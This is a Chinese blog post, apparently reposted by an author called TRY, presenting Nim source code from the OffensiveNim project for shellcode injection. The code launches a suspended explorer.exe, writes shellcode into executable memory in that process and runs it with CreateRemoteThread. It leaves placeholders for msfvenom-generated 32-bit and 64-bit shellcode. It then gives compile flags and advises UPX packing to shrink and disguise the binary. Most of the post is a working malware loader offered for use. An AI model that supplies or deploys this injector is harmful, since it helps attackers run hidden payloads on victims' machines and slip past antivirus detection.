至少我们曾经在一起过。
来自:一言
前言
项目地址:https://github.com/byt3bl33d3r/OffensiveNim
nim社区:https://nim-lang-cn.org/
[aru_3][aru_3][aru_4]
源码
#[
Author: Marcello Salvati, Twitter: @byt3bl33d3r
License: BSD 3-Clause
]#
import winim/lean
import osproc
proc injectCreateRemoteThread[I, T](shellcode: array[I, T]): void =
# Under the hood, the startProcess function from Nim's osproc module is calling CreateProcess() :D
let tProcess = startProcess("explorer.exe") #注入的进程
tProcess.suspend() # That's handy!
echo "[*] Target Process: ", tProcess.processID
let pHandle = OpenProcess(
PROCESS_ALL_ACCESS,
false,
cast[DWORD](tProcess.processID)
)
echo "[*] pHandle: ", pHandle
let rPtr = VirtualAllocEx(
pHandle,
NULL,
cast[SIZE_T](shellcode.len),
MEM_COMMIT,
PAGE_EXECUTE_READ_WRITE
)
var bytesWritten: SIZE_T
let wSuccess = WriteProcessMemory(
pHandle,
rPtr,
unsafeAddr shellcode,
cast[SIZE_T](shellcode.len),
addr bytesWritten
)
echo "[*] WriteProcessMemory: ", bool(wSuccess)
echo " \\-- bytes written: ", bytesWritten
echo ""
let tHandle = CreateRemoteThread(
pHandle,
NULL,
0,
cast[LPTHREAD_START_ROUTINE](rPtr),
NULL,
0,
NULL
)
echo "[*] tHandle: ", tHandle
echo "[+] Injected"
when defined(windows):
# https://github.com/nim-lang/Nim/wiki/Consts-defined-by-the-compiler
when defined(i386):
# ./msfvenom -p windows/messagebox -f csharp, then modified for Nim arrays
echo "[*] Running in x86 process"
var shellcode: array[933, byte] = [
byte #填写你的shellcode,32位]
elif defined(amd64):
# ./msfvenom -p windows/x64/messagebox -f csharp, then modified for Nim arrays
echo "[*] Running in x64 process"
var shellcode: array[933, byte] = [
byte #填写你的shellcode,64位]
# This is essentially the equivalent of 'if __name__ == '__main__' in python
when isMainModule:
injectCreateRemoteThread(shellcode)
编译说明
nim c -d=mingw --app=console --cpu=amd64 -d:danger -d:strip --opt:size shell.nim #文件名 编译后需要进行upx压缩
本文作者为TRY,转载请注明。